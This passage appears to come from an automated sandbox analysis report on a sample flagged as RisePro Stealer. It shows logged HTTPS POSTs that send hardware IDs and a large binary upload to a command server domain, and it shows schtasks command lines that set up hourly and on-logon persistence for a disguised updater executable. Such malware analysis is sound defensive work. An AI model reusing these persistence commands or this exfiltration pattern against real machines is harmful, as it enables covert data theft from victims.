                                                                                                                                            2024-04-21 13:31:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            39192.168.2.449779172.67.189.664435948C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:45 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 7091
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:45 UTC7091OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:45 UTC820INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:45 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=flcnq1n5shp5g6ovhbd0resgk1; expires=Thu, 15-Aug-2024 07:18:24 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bFsdi%2FfQ79Yq31%2BwMjHfrktW%2B2drXK1seWqwOfiywGMRpHB7p69Zw%2FG32Xi3XQ%2FD3tq57ethBqnk6idG6P6XxQ3qkeSt64q%2BE7PnozyX3uGqaEUPZ0xSTIOSH6BNiLjmUzHdJ4j%2BbXJrVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc7849fab0bd-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:45 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            40192.168.2.449780172.67.189.664435948C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:45 UTC288OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 1388
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:45 UTC1388OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:46 UTC810INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:46 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=glf1i0drgvimidhkso28j2p950; expires=Thu, 15-Aug-2024 07:18:25 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0gm8S6SUzDqX41jmdL5rpMNUtR3IddZDLEupRn5a8V8mxr9G1x9h8Lg6pNk%2BDNor5p6DE46PtKO3MoWLBFNsD6k5LjQviLFPGfOZP1d363sVazt7kChScSbTyPwBN9GAgRuCx%2FW0leSoWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc7c3bc444d9-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            2024-04-21 13:31:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                                                                                                            Data Ascii: fok 81.181.57.52
                                                                                                                                            2024-04-21 13:31:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            41192.168.2.449781172.67.189.664435948C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:47 UTC290OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 591259
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: 26 3a e3 52 b8 55 3a 81 7a a0 c3 65 97 4b aa 7f 57 0f d7 38 70 6c ff 7b e4 20 c4 00 62 3a a7 43 3d 02 40 22 1c b6 99 87 18 c7 a4 c1 3e d8 3f 22 18 c3 fb 4b ae ce 9e 3e b6 0f b5 6e 16 c2 3e 21 08 6d e1 43 de 64 64 22 e0 1b aa 85 92 e0 fd 61 72 65 17 3f 88 d3 61 de 0f c3 10 f6 1b 57 d2 90 9a 56 20 74 1f c7 d5 91 31 b5 f6 40 0b 29 fd 38 98 21 9b a3 c6 ac 5a 47 0a d6 56 13 cf fc 6e b7 66 7f 75 92 09 0d 88 d5 a0 56 40 c7 f2 b9 81 4f 1b fb bb ab 3b cf cd d7 b8 7e ba f6 56 fc 7c 93 f6 5c 54 b5 dc ba fc 94 4e 48 fc 5e 83 91 bb f6 32 14 12 23 03 0d 8b ad a8 4d e5 2e 03 9f 7d d4 63 48 7f ae a3 ee 45 2e 6c e5 12 f5 d2 4c 82 4a 64 ad 20 d2 48 43 dd 97 c4 2f 9c 11 7d e7 b7 7a 4f ee f9 5a b7 24 85 1b 87 86 f4 62 4e ef a7 22 12 4a 82 bf 7c c9 de 2b 53 b4 c1 15 ca d9 4c
                                                                                                                                            Data Ascii: &:RU:zeKW8pl{ b:C=@">?"K>n>!mCdd"are?aWV t1@)8!ZGVnfuV@O;~V|\TNH^2#M.}cHE.lLJd HC/}zOZ$bN"J|+SL
                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: be 26 1b fc f0 79 bc 31 8b c9 4d 8e 14 3a a6 db c7 10 df fe ec f5 bb 0a 84 e7 02 a3 9b ff c1 6b ef 58 2d d4 59 c3 6a 6a 52 a7 a3 e4 46 6a 63 c0 72 0a 95 f0 4b 6a 38 dd 38 40 fa 24 bc a1 1f 66 1c 4b f0 c2 90 50 0b c7 6f 35 47 6a cd 84 1f ea 30 86 fd db f4 a2 57 bf a1 a3 bd 7c b8 f6 95 68 4b ef 15 39 6d e5 2c 1d ec b3 8f 34 37 fc 2c 92 d4 cb 6f e3 c5 d7 96 7b 68 2b c3 cb 7c 7c 67 58 ff a5 85 39 37 d1 c7 1d 5c cf 92 d8 39 a3 91 92 a6 c3 01 cb 13 83 c5 c5 5b 9d 3f b3 05 0d 06 6e ff 39 25 e0 db b1 9c df 44 34 29 e9 24 bd 64 35 51 9d 63 b5 90 f9 9b 14 b3 fe 66 39 fe a5 1c 2a e2 51 69 52 aa 49 f4 c6 d9 b9 8f 3a 5c 06 dc 14 8b 6e fd 08 d2 b8 40 aa 47 68 42 ed 93 ab fc f3 fa 8a 1e bd 7a 23 dd 02 2e 7d 25 d2 0f 87 99 34 85 96 e0 50 2c 91 ae c7 5f 56 15 92 1e d4 e9
                                                                                                                                            Data Ascii: &y1M:kX-YjjRFjcrKj88@$fKPo5Gj0W|hK9m,47,o{h+||gX97\9[?n9%D4)$d5Qcf9*QiRI:\n@GhBz#.}%4P,_V
                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: 3f c9 a3 12 73 f7 12 fe a7 45 82 a4 6e 97 b6 aa c6 49 90 57 68 1c 17 fd 48 a3 05 d3 6e e5 97 f0 97 43 52 55 1b bc 51 5d 15 31 62 e0 d7 89 2b 64 75 7c 1d fa 77 a2 3e f3 3b 20 78 af cb b7 43 9b de 39 cd 47 d8 9e ad a1 d1 3c bc a1 85 25 5c db 87 ae 58 26 58 a6 92 c5 48 8e d4 5c 5f db c1 68 b1 dd 65 82 00 ee 6d 80 0d 6c 89 a0 df 58 26 2e f1 ab 29 20 49 92 29 4e 41 f3 74 2f 80 69 d3 c3 1b 53 8b 68 f3 81 c1 b0 80 f7 8f 8e de f9 c1 3a 00 54 c2 cf 0a 01 54 53 56 dc cd 8a 06 e5 89 c7 df db 2e cc 6b 55 6e f4 41 a4 84 cd 1c 11 f8 7d 0b 3d 09 b8 91 f3 83 da 5a e1 9a 98 97 2e 6b cd b8 f2 ef 7f 41 8e 25 32 6d 7c 39 a4 c4 c2 ad a4 e7 66 87 ad 17 39 6a e1 52 e2 cb 5f 0f 85 92 00 9b c8 a8 61 cf cc 5c ad 48 78 14 ec 34 b9 eb 2f f9 68 b6 90 69 84 82 b2 25 14 be ad 96 71 ad
                                                                                                                                            Data Ascii: ?sEnIWhHnCRUQ]1b+du|w>; xC9G<%\X&XH\_hemlX&.) I)NAt/iSh:TTSV.kUnA}=Z.kA%2m|9f9jR_a\Hx4/hi%q
                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: ce f7 8a 6b 6c c0 92 10 ec da 40 ea 51 ac 02 4d be 1b bd 7e f7 98 a9 0a f6 f7 ca c0 05 5e 8d 28 b2 05 29 c7 2e 94 cb 95 18 8e da 28 e1 89 32 af 64 6a 48 db 5d a0 e6 38 6a 90 b2 60 78 93 5d 8c 62 d1 9e c2 f8 61 59 8e 03 1b 31 df 5b ca 38 e5 68 ae 8f a6 9f e3 79 e1 53 f7 b1 f3 ec e5 61 f2 31 05 b2 0e bc 3f a2 31 5c b5 b9 c1 18 2f 87 cd 76 ed ce 2b aa 44 71 f3 ef 1c 3b b5 07 09 1b 6a 8f bb 97 67 20 77 27 54 74 49 79 df 6e 21 83 cd 9e 81 16 3d 8d 44 a3 82 5d 76 0a f2 c3 e4 24 ee 4e d1 c9 8c 3b fb df b7 3e 26 62 76 32 5d 8c e0 51 6c df 46 3e 55 30 5b 70 3b 36 d6 17 7e ed 24 3a d1 e8 f0 bc 75 76 53 58 20 23 6e 38 3b 10 25 cc aa a8 20 bd 39 e3 40 db ee 7d 28 80 f4 9d b3 1a 8c d1 69 cc ff 49 08 14 be f6 45 6f 8f a0 0c 12 dc 4f 7b 46 ba b7 71 90 a3 d0 ce c3 ea ec
                                                                                                                                            Data Ascii: kl@QM~^().(2djH]8j`x]baY1[8hySa1?1\/v+Dq;jg w'TtIyn!=D]v$N;>&bv2]QlF>U0[p;6~$:uvSX #n8;% 9@}(iIEoO{Fq
                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: b6 ab 52 86 75 7d 03 d6 ad aa e0 bc 35 91 3e c2 6f 7a f6 0b a1 ff 01 ca 83 6f 5e 87 65 09 a5 9a 18 34 e3 0a 17 2c ed 42 a7 38 fc 45 bc bd 9a 3d bb 9a 4e 1c 4e 0a 8a 44 38 f1 a4 79 a3 96 2e 29 a6 fb b2 fe 92 4b 9c 33 6e e6 2e 6b 22 ae 9b a5 36 6f 2b 31 32 a6 e3 00 8e 81 fb 79 74 7a 0d c6 0e 12 f1 a3 3f b0 85 5b 53 26 ed 35 38 b3 60 c5 26 ae e9 ef 88 1a 86 55 70 24 fa 61 cf 6e 37 a5 da ea 4b c1 50 3e ac 4b fb f9 75 17 bb f7 e6 e0 63 97 37 6d db 59 a6 74 b7 97 1b f5 57 85 4b c0 a2 a6 18 18 7e d5 ac 28 a5 72 5e ed 75 cb e5 fd af bf 2a de 6e 66 9a 13 16 5a e1 6a 06 93 a5 65 81 19 ea 4c f5 7f 18 b0 d8 44 8a f5 03 eb 6b 22 be f2 bd db 01 85 f3 3f b4 5f b7 95 7e 39 e6 44 67 51 e1 87 6d 87 e3 4e 54 af a0 23 65 7f 14 31 99 78 d1 81 4a ff 2f 48 7f 9a 86 ac 76 4e 5c
                                                                                                                                            Data Ascii: Ru}5>ozo^e4,B8E=NND8y.)K3n.k"6o+12ytz?[S&58`&Up$an7KP>Kuc7mYtWK~(r^u*nfZjeLDk"?_~9DgQmNT#e1xJ/HvN\
                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: 53 89 b7 8d c2 69 7a 5d 2d 66 e1 bc c2 e2 6b 8b 49 c5 e8 72 c3 7f 1d df ec 21 86 05 fc 55 c8 3a 83 eb c3 02 53 61 98 b7 40 2c 31 70 f5 e3 da 62 44 52 0e 3f de 15 dc 57 7b f8 aa 4c 68 f1 74 13 02 25 96 53 87 57 13 33 bc 08 5c d2 53 b5 b0 ae 06 52 b9 e4 fe 2f a7 6b 84 24 38 1c 43 69 9b c8 65 5a 20 70 df df cd 8c 26 7d 0b 90 ee ef 28 a5 c2 05 5a 3b b5 18 2c eb 2b a7 d4 1a 31 1d 5d 48 e7 11 af af ef 9a db 22 f8 6b 20 d9 72 2b 27 65 83 cb 7d 00 82 23 ff 98 fb a7 e8 c2 f6 8f 96 20 ad 9b 80 b2 da 69 7d 18 e4 6f 61 3d be 80 85 74 31 c0 d3 47 cd d3 02 c4 34 e5 dc 2e 18 ef 7a 6d af 76 99 5b db 79 5f f0 9a af 64 8d 21 18 ce a9 81 5a 0f b6 66 bf c4 9d 00 d8 06 cc 90 02 55 5e 0c 88 b0 17 ff 1e ea 03 40 e1 05 58 18 4b 3d 82 64 ac 1d 91 99 95 cc ef fa 00 00 bd 4b 19 88
                                                                                                                                            Data Ascii: Siz]-fkIr!U:Sa@,1pbDR?W{Lht%SW3\SR/k$8CieZ p&}(Z;,+1]H"k r+'e}# i}oa=t1G4.zmv[y_d!ZfU^@XK=dK
                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: df 93 1a ad 6a 2f 90 49 59 9e f8 99 ea 28 3f 10 69 77 2d 3f 3d 0d 9d 33 8f 9f cb 54 23 8c 4b 63 11 5c a9 23 87 5e f4 d8 0f 84 1b 62 ec ba 3a 95 ac cb 9a dc 67 f4 32 33 4a 91 7d b2 fb ba 02 d3 69 7b 11 8c 52 b1 ae fb e5 3c 53 16 12 63 ea d2 cc 03 c6 6e 57 4a fd 67 5a bd 1a 5d 67 1f 1c aa e0 eb b6 81 f0 b8 ae 2f ae ff f0 20 b9 e0 21 d6 ce 59 fc 37 b2 a6 c5 c1 9b ce d3 cc 21 57 e2 d8 6c 5a f2 9c c2 b3 9e c0 55 2b 9b 5b 54 2c 25 f0 eb b5 a0 d9 bf bd 64 13 ea c5 2c a3 2b 10 b0 7b 18 39 97 f3 a5 9f 83 5f 9e 0d 96 ab 96 1a ea 53 59 67 2d 3f d3 55 18 52 0b 07 6d bc 40 5b 96 36 c3 c7 44 f1 2d e7 eb c1 6f c1 6f 7e d0 36 2f 2d 0c 1e 0d 81 58 3e a1 ed 6c 45 aa 2f 39 9d dc ab cb 89 bb f1 e5 ce ee 47 9c 0d 89 ec 4b 67 30 6b 57 9c e6 76 75 ce b8 97 b7 0f af ce 0e 33 ea
                                                                                                                                            Data Ascii: j/IY(?iw-?=3T#Kc\#^b:g23J}i{R<ScnWJgZ]g/ !Y7!WlZU+[T,%d,+{9_SYg-?URm@[6D-oo~6/-X>lE/9GKg0kWvu3
                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: d9 8d ed 57 07 5e 7a 18 9d 92 74 4a a1 b3 a0 f5 ee 2d 1f 56 47 47 4f ad a3 40 0e 60 d7 3d ff e6 bd e2 3b 1f e1 c4 76 35 a6 8f fc 5a 7f 96 8b 34 d8 70 3f 02 48 2a c4 f6 3f 1b 59 bb ed dc 05 c4 05 10 b2 27 2f cf 9a fa 41 a5 77 b1 3e cf d2 a5 ef 38 58 65 38 67 1b 0b 0b c3 b6 a3 d5 51 21 97 bf d4 1c 96 52 a2 7b 71 4a 12 28 e8 68 43 1e 5e ec 82 69 6e 1b a3 51 98 c1 0e 91 c3 5e ac 49 c1 34 eb 17 5a 86 06 3d d3 e0 e4 50 6f 3c fb 57 a2 39 34 ec 0e 35 65 2a fb 04 df 6a 33 e0 d9 8e d6 9a 8a 6a 8a 51 b5 36 3a 62 b5 2f 10 dd 41 af 5f f3 5c 40 7a b0 21 f3 32 7c 5b ff d6 4f 62 02 4e c0 1b af 2a 7b d4 80 ef e9 bc 46 16 ba 52 33 11 e6 65 9b fa 4b da e6 55 b4 1b 8e f0 29 42 d2 97 1a f9 a9 cb cb 32 9f 88 d2 b8 49 65 b2 50 07 a0 18 f2 ca 04 92 89 17 48 42 94 fd 02 79 6f 6b
                                                                                                                                            Data Ascii: W^ztJ-VGGO@`=;v5Z4p?H*?Y'/Aw>8Xe8gQ!R{qJ(hC^inQ^I4Z=Po<W945e*j3jQ6:b/A_\@z!2|[ObN*{FR3eKU)B2IePHByok
                                                                                                                                            2024-04-21 13:31:47 UTC15331OUTData Raw: 79 72 84 b0 72 d8 61 ed 40 9a 6a cc ec c5 b2 c3 f3 ad 93 55 db ed 9e ee 8e 21 6d b9 ec bb ae af de 65 eb 26 07 6c 1f f0 92 9d 7c b6 10 b1 6a 3b 88 1a 31 48 38 77 46 ea 49 ee 42 fe 5b 43 ff 1a ce c1 0d 6d 0b bf 9e ec 32 86 32 61 3a 6e eb f7 d3 ef 56 1d f6 d6 b2 19 b9 29 ab 01 0f 85 55 25 c6 b4 65 c2 e1 9e 62 89 cf 22 e9 72 af 6a 10 81 94 80 bb 66 1a eb d1 c6 98 23 2b 1a 43 0c 0f b8 80 58 4a a4 1c 1f 4c 4e 8f a4 33 b7 9e ba 99 43 b0 60 b4 8e b2 3f f3 d1 26 62 f7 ac a5 a3 51 74 67 76 2f ca 4c fc bc 4f fb 79 3a 1d 4e ab af 4c f1 b4 37 f5 b0 8e d4 e6 c4 ee 18 e8 81 22 8f b0 1f 7b 78 f6 42 a7 29 87 74 96 07 82 58 bd d1 4c 03 99 0f 17 75 dd 1e 89 e7 33 62 5b 9c 69 88 10 df 35 db 68 c7 f1 c2 60 96 f0 2e 7c f2 56 e3 21 52 93 78 04 9d 15 a0 9c e1 98 cc 32 a5 b9 ca
                                                                                                                                            Data Ascii: yrra@jU!me&l|j;1H8wFIB[Cm22a:nV)U%eb"rjf#+CXJLN3C`?&bQtgv/LOy:NL7"{xB)tXLu3b[i5h`.|V!Rx2
                                                                                                                                            2024-04-21 13:31:48 UTC812INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:48 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=p13gcp42003vkk63m9mkmvmk07; expires=Thu, 15-Aug-2024 07:18:27 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hyFYCE%2FMA7fxeH7lE3gnUa1f%2B2MAqdmeeQj8%2BqqmFBnDANksx5f6MIj8tX4i6eY59J7oOziniwg3qu0EPCjFAfG5OCiMFWtmVQXImrR0yuenYPRpTD96H7MLuIaX2HEWBkAurdogCTQmzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc837e8b4529-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:15:30:56
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Users\user\Desktop\2q45IEa3Ee.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\2q45IEa3Ee.exe"
                                                                                                                                            Imagebase:0xc60000
                                                                                                                                            File size:2'551'616 bytes
                                                                                                                                            MD5 hash:4A36FA7C0CCBC6842C541A6439AB545A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.1824382503.0000000005E26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:2
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR" /sc HOURLY /rl HIGHEST
                                                                                                                                            Imagebase:0xdf0000
                                                                                                                                            File size:187'904 bytes
                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:4
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                            Imagebase:0xdf0000
                                                                                                                                            File size:187'904 bytes
                                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:15:31:19
                                                                                                                                            Start date:21/04/2024
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
